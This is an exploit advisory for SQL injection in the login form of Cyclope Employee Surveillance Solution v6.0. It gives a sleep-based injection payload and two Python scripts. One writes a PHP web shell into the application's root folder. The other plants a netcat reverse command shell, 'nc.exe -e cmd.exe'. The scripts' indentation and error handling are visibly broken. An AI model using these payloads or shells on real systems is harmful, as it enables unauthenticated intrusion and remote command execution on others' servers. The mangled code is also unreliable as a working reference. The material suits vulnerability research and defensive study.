# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html

# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform 
# and equip management with statistics relating to the productivity of staff within their organization. 

# Vulnerability:
# Due to improper input sensitization, many parameters are prone to SQL injection.
# Most importantly, the username parameter in the application's login form.

# PoC 1:
# MySql sleep for 5 seconds.
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# username: x' or sleep(5) and '1'='1
# password: whatever

# As stated, nothing is checked before passing "username" to MySql.
# This results in MySql sleeping for 5 seconds, and a unsuccessful
# attempt. 

# PoC 2:
# Remote Code Execution
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username

# Creates a small php shell in the application's root folder.
# It also has the added bonus of writing the administrator username and password
# Side note: 
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.

----Python Script Simple Backdoor----

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <CMD>"
    print "[*] Ex.  : poc.py ipconfig"

rhost = sys.argv[1]
rcmd = sys.argv[2]

backdoor = "<?php system($_GET['exe']);?>"

prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:7879/" % rhost, post_params)
print "[*] Triggering backdoor"
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(cmd)
print "[*] Executing command: %s\n" % rcmd
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)
        page = urllib.urlopen(shell)
        cmd = page.read()
        print cmd
        print "[-] Oups! Somthing happened"

---Python Getting Shell---

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <RHOST>"

rhost = sys.argv[1]

backdoor = '''<?php
shell_exec("nc.exe 4444 -e cmd.exe");?>'''

prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
        resp = opener.open("http://%s:7879/" % rhost, post_params)
        print "[*] Triggering Shell"
        shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
        page = urllib.urlopen(shell)
        cmd = page.read()
        print "[-] Oups! Somthing happened"

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Cyclope Employee Surveillance Solution v6.0 SQL Injection
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